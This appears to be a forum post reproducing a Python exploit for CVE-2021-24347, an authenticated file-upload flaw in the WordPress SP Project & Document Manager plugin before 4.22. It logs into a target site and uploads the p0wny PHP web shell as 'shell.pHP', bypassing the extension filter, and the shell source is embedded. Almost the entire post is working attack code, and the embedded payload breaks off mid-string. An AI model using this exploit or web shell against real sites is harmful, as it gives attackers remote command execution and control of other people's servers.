WordPress SP Project And Document Manager 4.21 Shell Upload

#333
Topic created · 1 Posts · 1 Views
  • # Exploit Title: Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
    # Date 07.07.2021
    # Exploit Author: Ron Jost (Hacker5preme)
    # Vendor Homepage: https://smartypantsplugins.com/
    # Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip
    # Version: Before 4.22
    # Tested on: Ubuntu 18.04
    # CVE: CVE-2021-24347
    # CWE: CWE-434
    # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24347/README.md
    
    '''
    Description:
    The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however,
    the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded
    by checking the file extension. It was discovered that php files could still be uploaded by
    changing the file extension's case, for example, from "php" to "pHP".
    '''
    
    
    '''
    Banner:
    '''
    banner = """
     \_\_\_\_\_\_ \_\_\_\_\_\_\_ \_\_\_\_ \_\_\_ \_\_\_\_ \_ \_\_\_\_ \_ \_ \_\_\_\_\_ \_ \_ \_\_\_\_\_ 
     / \_\_\_\ \ / / \_\_\_\_| |\_\_\_ \ / \_ \\_\_\_ \/ | |\_\_\_ \| || ||\_\_\_ /| || |\_\_\_ |
    | | \ \ / /| \_| \_\_\_\_\_ \_\_) | | | |\_\_) | |\_\_\_\_\_ \_\_) | || |\_ |\_ \| || |\_ / / 
    | |\_\_\_ \ V / | |\_\_|\_\_\_\_\_/ \_\_/| |\_| / \_\_/| |\_\_\_\_\_/ \_\_/|\_\_ \_|\_\_) |\_\_ \_/ / 
     \\_\_\_\_| \\_/ |\_\_\_\_\_| |\_\_\_\_\_|\\_\_\_/\_\_\_\_\_|\_| |\_\_\_\_\_| |\_||\_\_\_\_/ |\_|/\_/ 
    
     * Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated) 
     * @Hacker5preme
    
    """
    print(banner)
    
    
    '''
    Import required modules:
    '''
    import requests
    import argparse
    
    
    '''
    User-Input:
    '''
    my\_parser = argparse.ArgumentParser(description='Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)')
    my\_parser.add\_argument('-T', '--IP', type=str)
    my\_parser.add\_argument('-P', '--PORT', type=str)
    my\_parser.add\_argument('-U', '--PATH', type=str)
    my\_parser.add\_argument('-u', '--USERNAME', type=str)
    my\_parser.add\_argument('-p', '--PASSWORD', type=str)
    args = my\_parser.parse\_args()
    target\_ip = args.IP
    target\_port = args.PORT
    wp\_path = args.PATH
    username = args.USERNAME
    password = args.PASSWORD
    print('')
    print('[*] Starting Exploit:')
    print('')
    
    '''
    Authentication:
    '''
    session = requests.Session()
    auth\_url = 'http://' + target\_ip + ':' + target\_port + wp\_path + 'wp-login.php'
    
    # Header:
    header = {
     'Host': target\_ip,
     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0',
     'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
     'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
     'Accept-Encoding': 'gzip, deflate',
     'Content-Type': 'application/x-www-form-urlencoded',
     'Origin': 'http://' + target\_ip,
     'Connection': 'close',
     'Upgrade-Insecure-Requests': '1'
    }
    
    # Body:
    body = {
     'log': username,
     'pwd': password,
     'wp-submit': 'Log In',
     'testcookie': '1'
    }
    
    # Authenticate:
    print('')
    auth = session.post(auth\_url, headers=header, data=body)
    auth\_header = auth.headers['Set-Cookie']
    if 'wordpress\_logged\_in' in auth\_header:
     print('[+] Authentication successfull !')
    else:
     print('[-] Authentication failed !')
     exit()
    
    
    '''
    Retrieve User ID from the widget:
    '''
    user\_id\_text = session.get('http://' + target\_ip + ':' + target\_port + wp\_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview').text
    search\_string = "<form><select name='user\_uid' id='user\_uid' class=''>"
    user\_string = ">" + username
    user\_id\_text = user\_id\_text[user\_id\_text.find(search\_string):]
    user\_id\_text = user\_id\_text[user\_id\_text.find(user\_string) - 2: user\_id\_text.find(user\_string)]
    user\_id = user\_id\_text.replace("'", '')
    
    
    '''
    Exploit:
    '''
    exploit\_url = "http://" + target\_ip + ':' + target\_port + wp\_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview&id=' + user\_id
    
    # Header (Exploit):
    Header = {
     "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0",
     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
     "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
     "Accept-Encoding": "gzip, deflate",
     "Referer": exploit\_url,
     "Content-Type": "multipart/form-data; boundary=---------------------------37032792112149247252673711332",
     "Origin": "http://" + target\_ip,
     "Connection": "close",
     "Upgrade-Insecure-Requests": "1"
    }
    
    # Web Shell payload (p0wny shell): https://github.com/flozz/p0wny-shell
    shell\_payload = "-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"cdm\_upload\_file\_field\"\r\n\r\na1b3bac1bc\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"\_wp\_http\_referer\"\r\n\r\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-name\"\r\n\r\nExploits\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"shell.pHP\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg\_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg\_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg\_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg\_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg\_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell\_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file\_get\_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64\_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64\_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($\_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($\_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $\_POST['cmd'];\n if (!preg\_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $\_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($\_POST['filename'], $\_POST['cwd'], $\_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($\_POST['path'], $\_POST['file'], $\_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json\_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>[email protected]:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-we
    
    # Exploit:
    session.post(exploit\_url, headers=header, data=shell\_payload)
    print('')
    print('[+] Exploit done !')
    print(' -> Webshell: http://' + target\_ip + ':' + target\_port + wp\_path + 'wp-content/uploads/sp-client-document-manager/' + user\_id + '/shell.php')
    print('')
     
    
    
Log in to reply